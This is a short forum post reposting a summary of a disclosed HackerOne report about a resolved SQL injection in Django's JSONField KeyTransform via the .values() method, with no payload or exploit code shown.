Navigation:   Dark C0d3rs Exploit Log Research Papers/Vulnerability reports HackerOne Disclosed Reports - 2025-09-12

HackerOne Disclosed Reports - 2025-09-12

0 Replies, 193 Views

 hashXploiter

   09-13-2025, 12:30 PM
Administrator
#1
Logo
High
resolved

SQL injection in JSONField KeyTransform


Bug reported by Eyal Gabay was disclosed at September 12, 2025, 12:28 am   |   SQL Injection

A vulnerability was discovered in the JSONField KeyTransform functionality of Django. The vulnerability allowed SQL injection attacks by crafting malicious user input for the .values() method. The vulnerability was demonstrated in the Django test suite, where a SQL syntax error was triggered by inputting a specifically crafted string.


[Image: e72398fe92beda2aa80d0329e8b9f4febece7568.gif]

Messages In This Thread
HackerOne disclosed reports - 2025-09-12 - by hashXploiter - 09-13-2025, 12:30 PM



Users browsing this thread: 1 Guest(s)